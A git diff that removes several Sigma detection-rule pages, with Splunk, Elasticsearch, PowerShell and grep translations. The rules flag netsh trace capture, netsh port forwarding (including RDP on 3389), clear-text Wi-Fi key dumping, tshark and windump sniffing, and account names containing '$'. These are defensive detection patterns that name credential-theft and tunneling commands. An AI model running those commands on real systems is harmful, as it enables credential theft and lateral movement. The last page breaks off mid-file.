-| Title                    | Capture a Network Trace with netsh.exe       |
-|:-------------------------|:------------------|
-| **Description**          | Detects capture a network trace via netsh.exe trace functionality |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0007: Discovery](https://attack.mitre.org/tactics/TA0007)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1040: Network Sniffing](https://attack.mitre.org/techniques/T1040)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1040: Network Sniffing](../Triggers/T1040.md)</li></ul>  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Legitimate administrator or user uses netsh.exe trace functionality for legitimate reason</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://blogs.msdn.microsoft.com/canberrapfe/2012/03/30/capture-a-network-trace-without-installing-anything-capture-a-network-trace-of-a-reboot/](https://blogs.msdn.microsoft.com/canberrapfe/2012/03/30/capture-a-network-trace-without-installing-anything-capture-a-network-trace-of-a-reboot/)</li></ul>  |
-| **Author**               | Kutepov Anton, oscd.community |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Capture a Network Trace with netsh.exe
-id: d3c3861d-c504-4c77-ba55-224ba82d0118
-status: experimental
-description: Detects capture a network trace via netsh.exe trace functionality
-references:
-    - https://blogs.msdn.microsoft.com/canberrapfe/2012/03/30/capture-a-network-trace-without-installing-anything-capture-a-network-trace-of-a-reboot/
-author: Kutepov Anton, oscd.community
-date: 2019/10/24
-tags:
-    - attack.discovery
-    - attack.t1040
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine|contains|all: 
-            - netsh
-            - trace
-            - start
-    condition: selection    
-falsepositives: 
-    - Legitimate administrator or user uses netsh.exe trace functionality for legitimate reason
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and $_.message -match "CommandLine.*.*netsh.*" -and $_.message -match "CommandLine.*.*trace.*" -and $_.message -match "CommandLine.*.*start.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.event_data.CommandLine.keyword:*netsh* AND winlog.event_data.CommandLine.keyword:*trace* AND winlog.event_data.CommandLine.keyword:*start*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/d3c3861d-c504-4c77-ba55-224ba82d0118 <<EOF
-{
-  "metadata": {
-    "title": "Capture a Network Trace with netsh.exe",
-    "description": "Detects capture a network trace via netsh.exe trace functionality",
-    "tags": [
-      "attack.discovery",
-      "attack.t1040"
-    ],
-    "query": "(winlog.event_data.CommandLine.keyword:*netsh* AND winlog.event_data.CommandLine.keyword:*trace* AND winlog.event_data.CommandLine.keyword:*start*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.event_data.CommandLine.keyword:*netsh* AND winlog.event_data.CommandLine.keyword:*trace* AND winlog.event_data.CommandLine.keyword:*start*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Capture a Network Trace with netsh.exe'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(CommandLine.keyword:*netsh* AND CommandLine.keyword:*trace* AND CommandLine.keyword:*start*)
-```
-
-
-### splunk
-    
-```
-(CommandLine="*netsh*" CommandLine="*trace*" CommandLine="*start*")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine="*netsh*" CommandLine="*trace*" CommandLine="*start*")
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?=.*.*netsh.*)(?=.*.*trace.*)(?=.*.*start.*))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_netsh_port_fwd.md b/Atomic_Threat_Coverage/Detection_Rules/win_netsh_port_fwd.md
deleted file mode 100644
index 5910254..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_netsh_port_fwd.md
+++ /dev/null
@@ -1,175 +0,0 @@
-| Title                    | Netsh Port Forwarding       |
-|:-------------------------|:------------------|
-| **Description**          | Detects netsh commands that configure a port forwarding |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0008: Lateral Movement](https://attack.mitre.org/tactics/TA0008)</li><li>[TA0011: Command and Control](https://attack.mitre.org/tactics/TA0011)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1090: Proxy](https://attack.mitre.org/techniques/T1090)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Legitimate administration</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html](https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html)</li></ul>  |
-| **Author**               | Florian Roth |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Netsh Port Forwarding
-id: 322ed9ec-fcab-4f67-9a34-e7c6aef43614
-description: Detects netsh commands that configure a port forwarding
-references:
-    - https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html
-date: 2019/01/29
-tags:
-    - attack.lateral_movement
-    - attack.command_and_control
-    - attack.t1090
-status: experimental
-author: Florian Roth
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine:
-            - netsh interface portproxy add v4tov4 *
-    condition: selection
-falsepositives:
-    - Legitimate administration
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "CommandLine.*netsh interface portproxy add v4tov4 .*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:(netsh\ interface\ portproxy\ add\ v4tov4\ *)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/322ed9ec-fcab-4f67-9a34-e7c6aef43614 <<EOF
-{
-  "metadata": {
-    "title": "Netsh Port Forwarding",
-    "description": "Detects netsh commands that configure a port forwarding",
-    "tags": [
-      "attack.lateral_movement",
-      "attack.command_and_control",
-      "attack.t1090"
-    ],
-    "query": "winlog.event_data.CommandLine.keyword:(netsh\\ interface\\ portproxy\\ add\\ v4tov4\\ *)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:(netsh\\ interface\\ portproxy\\ add\\ v4tov4\\ *)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Netsh Port Forwarding'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:(netsh interface portproxy add v4tov4 *)
-```
-
-
-### splunk
-    
-```
-(CommandLine="netsh interface portproxy add v4tov4 *")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine IN ["netsh interface portproxy add v4tov4 *"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*netsh interface portproxy add v4tov4 .*)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_netsh_port_fwd_3389.md b/Atomic_Threat_Coverage/Detection_Rules/win_netsh_port_fwd_3389.md
deleted file mode 100644
index 74b8515..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_netsh_port_fwd_3389.md
+++ /dev/null
@@ -1,175 +0,0 @@
-| Title                    | Netsh RDP Port Forwarding       |
-|:-------------------------|:------------------|
-| **Description**          | Detects netsh commands that configure a port forwarding of port 3389 used for RDP |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0008: Lateral Movement](https://attack.mitre.org/tactics/TA0008)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1021: Remote Services](https://attack.mitre.org/techniques/T1021)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Legitimate administration</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html](https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html)</li></ul>  |
-| **Author**               | Florian Roth |
-| Other Tags           | <ul><li>car.2013-07-002</li></ul> | 
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Netsh RDP Port Forwarding
-id: 782d6f3e-4c5d-4b8c-92a3-1d05fed72e63
-description: Detects netsh commands that configure a port forwarding of port 3389 used for RDP
-references:
-    - https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html
-date: 2019/01/29
-tags:
-    - attack.lateral_movement
-    - attack.t1021
-    - car.2013-07-002
-status: experimental
-author: Florian Roth
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine:
-            - netsh i* p*=3389 c*
-    condition: selection
-falsepositives:
-    - Legitimate administration
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "CommandLine.*netsh i.* p.*=3389 c.*")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:(netsh\ i*\ p*\=3389\ c*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/782d6f3e-4c5d-4b8c-92a3-1d05fed72e63 <<EOF
-{
-  "metadata": {
-    "title": "Netsh RDP Port Forwarding",
-    "description": "Detects netsh commands that configure a port forwarding of port 3389 used for RDP",
-    "tags": [
-      "attack.lateral_movement",
-      "attack.t1021",
-      "car.2013-07-002"
-    ],
-    "query": "winlog.event_data.CommandLine.keyword:(netsh\\ i*\\ p*\\=3389\\ c*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:(netsh\\ i*\\ p*\\=3389\\ c*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Netsh RDP Port Forwarding'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:(netsh i* p*=3389 c*)
-```
-
-
-### splunk
-    
-```
-(CommandLine="netsh i* p*=3389 c*")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine IN ["netsh i* p*=3389 c*"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*netsh i.* p.*=3389 c.*)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_netsh_wifi_credential_harvesting.md b/Atomic_Threat_Coverage/Detection_Rules/win_netsh_wifi_credential_harvesting.md
deleted file mode 100644
index f81ec2a..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_netsh_wifi_credential_harvesting.md
+++ /dev/null
@@ -1,173 +0,0 @@
-| Title                    | Harvesting of Wifi Credentials Using netsh.exe       |
-|:-------------------------|:------------------|
-| **Description**          | Detect the harvesting of wifi credentials using netsh.exe |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0007: Discovery](https://attack.mitre.org/tactics/TA0007)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1040: Network Sniffing](https://attack.mitre.org/techniques/T1040)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1040: Network Sniffing](../Triggers/T1040.md)</li></ul>  |
-| **Severity Level**       | medium |
-| **False Positives**      | <ul><li>Legitimate administrator or user uses netsh.exe wlan functionality for legitimate reason</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/](https://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/)</li></ul>  |
-| **Author**               | Andreas Hunkeler (@Karneades) |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Harvesting of Wifi Credentials Using netsh.exe
-id: 42b1a5b8-353f-4f10-b256-39de4467faff
-status: experimental
-description: Detect the harvesting of wifi credentials using netsh.exe
-references:
-    - https://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/
-author: Andreas Hunkeler (@Karneades)
-date: 2020/04/20
-tags:
-    - attack.discovery
-    - attack.t1040
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-        CommandLine:
-            - 'netsh wlan s* p* k*=clear'
-    condition: selection
-falsepositives:
-    - Legitimate administrator or user uses netsh.exe wlan functionality for legitimate reason
-level: medium
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {($_.ID -eq "1" -and ($_.message -match "CommandLine.*netsh wlan s.* p.* k.*=clear")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-winlog.event_data.CommandLine.keyword:(netsh\ wlan\ s*\ p*\ k*\=clear)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/42b1a5b8-353f-4f10-b256-39de4467faff <<EOF
-{
-  "metadata": {
-    "title": "Harvesting of Wifi Credentials Using netsh.exe",
-    "description": "Detect the harvesting of wifi credentials using netsh.exe",
-    "tags": [
-      "attack.discovery",
-      "attack.t1040"
-    ],
-    "query": "winlog.event_data.CommandLine.keyword:(netsh\\ wlan\\ s*\\ p*\\ k*\\=clear)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "winlog.event_data.CommandLine.keyword:(netsh\\ wlan\\ s*\\ p*\\ k*\\=clear)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Harvesting of Wifi Credentials Using netsh.exe'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}{{_source}}\n================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-CommandLine.keyword:(netsh wlan s* p* k*=clear)
-```
-
-
-### splunk
-    
-```
-(CommandLine="netsh wlan s* p* k*=clear")
-```
-
-
-### logpoint
-    
-```
-(event_id="1" CommandLine IN ["netsh wlan s* p* k*=clear"])
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*netsh wlan s.* p.* k.*=clear)'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_network_sniffing.md b/Atomic_Threat_Coverage/Detection_Rules/win_network_sniffing.md
deleted file mode 100644
index 329c3e5..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_network_sniffing.md
+++ /dev/null
@@ -1,186 +0,0 @@
-| Title                    | Network Sniffing       |
-|:-------------------------|:------------------|
-| **Description**          | Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li><li>[TA0007: Discovery](https://attack.mitre.org/tactics/TA0007)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1040: Network Sniffing](https://attack.mitre.org/techniques/T1040)</li></ul>  |
-| **Data Needed**          | <ul><li>[DN0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN0003_1_windows_sysmon_process_creation](../Data_Needed/DN0003_1_windows_sysmon_process_creation.md)</li></ul>  |
-| **Trigger**              | <ul><li>[T1040: Network Sniffing](../Triggers/T1040.md)</li></ul>  |
-| **Severity Level**       | low |
-| **False Positives**      | <ul><li>Admin activity</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           | <ul><li>[https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.yaml](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.yaml)</li></ul>  |
-| **Author**               | Timur Zinniatullin, oscd.community |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: Network Sniffing
-id: ba1f7802-adc7-48b4-9ecb-81e227fddfd5
-status: experimental
-description: Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary
-    may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.
-author: Timur Zinniatullin, oscd.community
-date: 2019/10/21
-modified: 2019/11/04
-references:
-    - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.yaml
-logsource:
-    category: process_creation
-    product: windows
-detection:
-    selection:
-      - Image|endswith: '\tshark.exe'
-        CommandLine|contains: '-i'
-      - Image|endswith: '\windump.exe'
-    condition: selection
-falsepositives:
-    - Admin activity
-fields:
-    - Image
-    - CommandLine
-    - User
-    - LogonGuid
-    - Hashes
-    - ParentProcessGuid
-    - ParentCommandLine
-level: low
-tags:
-    - attack.credential_access
-    - attack.discovery
-    - attack.t1040
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Microsoft-Windows-Sysmon/Operational | where {(($_.ID -eq "1") -and (($_.message -match "Image.*.*\\tshark.exe" -and $_.message -match "CommandLine.*.*-i.*") -or $_.message -match "Image.*.*\\windump.exe")) } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-((winlog.event_data.Image.keyword:*\\tshark.exe AND winlog.event_data.CommandLine.keyword:*\-i*) OR winlog.event_data.Image.keyword:*\\windump.exe)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/ba1f7802-adc7-48b4-9ecb-81e227fddfd5 <<EOF
-{
-  "metadata": {
-    "title": "Network Sniffing",
-    "description": "Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.",
-    "tags": [
-      "attack.credential_access",
-      "attack.discovery",
-      "attack.t1040"
-    ],
-    "query": "((winlog.event_data.Image.keyword:*\\\\tshark.exe AND winlog.event_data.CommandLine.keyword:*\\-i*) OR winlog.event_data.Image.keyword:*\\\\windump.exe)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "((winlog.event_data.Image.keyword:*\\\\tshark.exe AND winlog.event_data.CommandLine.keyword:*\\-i*) OR winlog.event_data.Image.keyword:*\\\\windump.exe)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'Network Sniffing'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n            Image = {{_source.Image}}\n      CommandLine = {{_source.CommandLine}}\n             User = {{_source.User}}\n        LogonGuid = {{_source.LogonGuid}}\n           Hashes = {{_source.Hashes}}\nParentProcessGuid = {{_source.ParentProcessGuid}}\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-((Image.keyword:*\\tshark.exe AND CommandLine.keyword:*\-i*) OR Image.keyword:*\\windump.exe)
-```
-
-
-### splunk
-    
-```
-((Image="*\\tshark.exe" CommandLine="*-i*") OR Image="*\\windump.exe") | table Image,CommandLine,User,LogonGuid,Hashes,ParentProcessGuid,ParentCommandLine
-```
-
-
-### logpoint
-    
-```
-(event_id="1" ((Image="*\\tshark.exe" CommandLine="*-i*") OR Image="*\\windump.exe"))
-```
-
-
-### grep
-    
-```
-grep -P '^(?:.*(?:.*(?:.*(?=.*.*\tshark\.exe)(?=.*.*-i.*))|.*.*\windump\.exe))'
-```
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/win_new_or_renamed_user_account_with_dollar_sign.md b/Atomic_Threat_Coverage/Detection_Rules/win_new_or_renamed_user_account_with_dollar_sign.md
deleted file mode 100644
index 0b1928e..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/win_new_or_renamed_user_account_with_dollar_sign.md
+++ /dev/null
@@ -1,178 +0,0 @@
-| Title                    | New or Renamed User Account with '$' in Attribute 'SamAccountName'.       |
-|:-------------------------|:------------------|
-| **Description**          | Detects possible bypass EDR and SIEM via abnormal user account name. |
-| **ATT&amp;CK Tactic**    |  <ul><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul>  |
-| **ATT&amp;CK Technique** | <ul><li>[T1036: Masquerading](https://attack.mitre.org/techniques/T1036)</li></ul>  |
-| **Data Needed**          |  There is no documented Data Needed for this Detection Rule yet  |
-| **Trigger**              |  There is no documented Trigger for this Detection Rule yet  |
-| **Severity Level**       | high |
-| **False Positives**      | <ul><li>Unkown</li></ul>  |
-| **Development Status**   | experimental |
-| **References**           |  There are no documented References for this Detection Rule yet  |
-| **Author**               | Ilyas Ochkov, oscd.community |
-
-
-## Detection Rules
-
-### Sigma rule
-
-```
-title: New or Renamed User Account with '$' in Attribute 'SamAccountName'.
-id: cfeed607-6aa4-4bbd-9627-b637deb723c8
-status: experimental
-description: Detects possible bypass EDR and SIEM via abnormal user account name.
-tags:
-    - attack.defense_evasion
-    - attack.t1036
-author: Ilyas Ochkov, oscd.community
-date: 2019/10/25
-modified: 2019/11/13
-logsource:
-    product: windows
-    service: security
-detection:
-    selection:
-        EventID: 
-            - 4720 # create user
-            - 4781 # rename user
-        UserName|contains: '$'    #SamAccountName
-    condition: selection
-fields:
-    - EventID
-    - UserName
-    - SubjectAccountName
-falsepositives:
-    - Unkown
-level: high
-
-```
-
-
-
-
-
-### powershell
-    
-```
-Get-WinEvent -LogName Security | where {(($_.ID -eq "4720" -or $_.ID -eq "4781") -and $_.message -match "UserName.*.*$.*") } | select TimeCreated,Id,RecordId,ProcessId,MachineName,Message
-```
-
-
-### es-qs
-    
-```
-(winlog.channel:"Security" AND winlog.event_id:("4720" OR "4781") AND UserName.keyword:*$*)
-```
-
-
-### xpack-watcher
-    
-```
-curl -s -XPUT -H 'Content-Type: application/json' --data-binary @- localhost:9200/_watcher/watch/cfeed607-6aa4-4bbd-9627-b637deb723c8 <<EOF
-{
-  "metadata": {
-    "title": "New or Renamed User Account with '$' in Attribute 'SamAccountName'.",
-    "description": "Detects possible bypass EDR and SIEM via abnormal user account name.",
-    "tags": [
-      "attack.defense_evasion",
-      "attack.t1036"
-    ],
-    "query": "(winlog.channel:\"Security\" AND winlog.event_id:(\"4720\" OR \"4781\") AND UserName.keyword:*$*)"
-  },
-  "trigger": {
-    "schedule": {
-      "interval": "30m"
-    }
-  },
-  "input": {
-    "search": {
-      "request": {
-        "body": {
-          "size": 0,
-          "query": {
-            "bool": {
-              "must": [
-                {
-                  "query_string": {
-                    "query": "(winlog.channel:\"Security\" AND winlog.event_id:(\"4720\" OR \"4781\") AND UserName.keyword:*$*)",
-                    "analyze_wildcard": true
-                  }
-                }
-              ],
-              "filter": {
-                "range": {
-                  "timestamp": {
-                    "gte": "now-30m/m"
-                  }
-                }
-              }
-            }
-          }
-        },
-        "indices": [
-          "winlogbeat-*"
-        ]
-      }
-    }
-  },
-  "condition": {
-    "compare": {
-      "ctx.payload.hits.total": {
-        "not_eq": 0
-      }
-    }
-  },
-  "actions": {
-    "send_email": {
-      "throttle_period": "15m",
-      "email": {
-        "profile": "standard",
-        "from": "root@localhost",
-        "to": "root@localhost",
-        "subject": "Sigma Rule 'New or Renamed User Account with '$' in Attribute 'SamAccountName'.'",
-        "body": "Hits:\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\n           EventID = {{_source.EventID}}\n          UserName = {{_source.UserName}}\nSubjectAccountName = {{_source.SubjectAccountName}}================================================================================\n{{/ctx.payload.hits.hits}}",
-        "attachments": {
-          "data.json": {
-            "data": {
-              "format": "json"
-            }
-          }
-        }
-      }
-    }
-  }
-}
-EOF
-
-```
-
-
-### graylog
-    
-```
-(EventID:("4720" "4781") AND UserName.keyword:*$*)
-```
-
-
-### splunk
-    
-```
-(source="WinEventLog:Security" (EventCode="4720" OR EventCode="4781") UserName="*$*") | table EventCode,UserName,SubjectAccountName
-```
-
-
-### logpoint
-    
-```
